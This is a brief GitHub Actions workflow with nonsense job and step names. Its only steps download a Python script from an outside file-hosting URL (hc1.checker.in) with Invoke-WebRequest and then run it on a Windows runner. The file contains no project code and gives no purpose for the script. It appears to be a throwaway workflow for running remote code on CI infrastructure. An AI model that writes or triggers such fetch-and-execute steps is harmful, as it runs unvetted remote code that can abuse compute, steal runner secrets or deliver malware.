Û°name: kirl

on:
  workflow_dispatch:

jobs:
  kirr:
    runs-on: windows-latest

    steps:
    - name: b goh.
      run: Invoke-WebRequest -Uri "http://hc1.checker.in/file2link/documents/file_487468.py/goh.py" -OutFile "$env:USERPROFILE\goh.py"

    - name: Tmm
      run: python $env:USERPROFILE\goh.py
